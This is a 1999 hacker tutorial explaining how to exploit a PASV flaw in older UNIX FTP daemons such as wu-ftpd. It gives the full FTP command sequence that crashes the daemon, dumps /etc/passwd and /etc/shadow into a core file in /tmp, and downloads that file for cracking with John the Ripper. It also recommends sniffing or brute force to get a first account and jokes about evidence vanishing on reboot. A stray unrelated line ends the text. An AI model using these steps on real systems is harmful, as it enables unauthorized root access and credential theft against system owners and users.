Exploiting the FTP PASV Vulnerability

by Russ Rogers - 10/2/99

One of my favorite methods of accessing account names and passwords is using a PASV vulnerability that exists in the FTP daemons of some UNIX OS's. There are patches out to close this exploit, but the system administrator has to actually be interested enough to download the patch and install it. Failure to patch the system results in a core dump file that contains the entire /etc/passwd file AND the /etc/shadow files. Some versions of SSLftpd have also been known to have this vulnerability.

NOTE: This exploit requires at least ONE FTP user account that is NOT anonymous. You can either get this using a sniffer, a brute force attack, or you might already have one on the system.

Ok, the way this attack works is that it allows you to issue a premature PASV (passive mode) command. This command will crash some variations of an FTP daemon. When the daemon crashes, it also leaves a core file that contains a complete memory dump of all the information that resided in relevant memory prior to the crash. In our case, we want it to contain the /etc/passwd and /etc/shadow files.

Let's start by FTP'ing into the target computer using the user name and password that we already have. Chances are that this name/ password combination are for an ordinary user, otherwise you wouldn't need this exploit. :)

% ftp ftp.victim.com
Connected to securityhorizon.com.
victim.com FTP server (Version wu-2.4.2-academ May 7 10:00:46 1999) ready.
User (victim.com:(none)): lamer
Password required for lamer.
Password: lamepwd

Once we're in, let's change directory into the /tmp directory. This will be the directory that the core file will be dumped to for our later retrieval. Plus, since we all know that system administrators never look in here, we can be sure that the file will be removed at the next reboot. POOF! What evidence?

FTP> cd /tmp

Now we're logged in as a normal user AND we're in the right directory. What we need to do is try to become another user so that the FTP daemon loads the passwd and shadow files into local memory.

FTP> user root
Password required for root.
Password: wrongpass

Issuing the PASV command at the FTP prompt on vulnerable machines will now result is a core dump containing the /etc/passwd and /etc/ shadow files.

FTP> quote pasv

If the command did NOT produce a core file and the system is already patched, you will see the result "Entering passive mode". Otherwise, it will probably kick you off the system and restart itself. At this point, we need to log back in with your user and password.

Once you're back in, change back into the /tmp directory and issue the command to download the core file. After this, you can log out.

FTP> cd /tmp
FTP> bin
FTP> get ./core
FTP> quit

Congrats! Now you have a perfectly good passwd and shadow file. You'll need to edit them and remove the passwd file information from the core file and paste it into a new text file on your own machine. Then remove the encrypted password information from the shadow file portion of the core dump and paste that information into the passwd field of your new makeshift passwd file.

Now all you need to do is run a good password cracker like Jon the Ripper to obtain your root password. Individual results may vary! :-)

Hack on... Russ
http://www.securityhorizon.com

PS - Some fixes to this problem are discussed in a newsgroup thread at http://remus.prakinf.tu-ilmenau.de/ssl-users/archive9/0080. html.

Shows non-hidden shares on server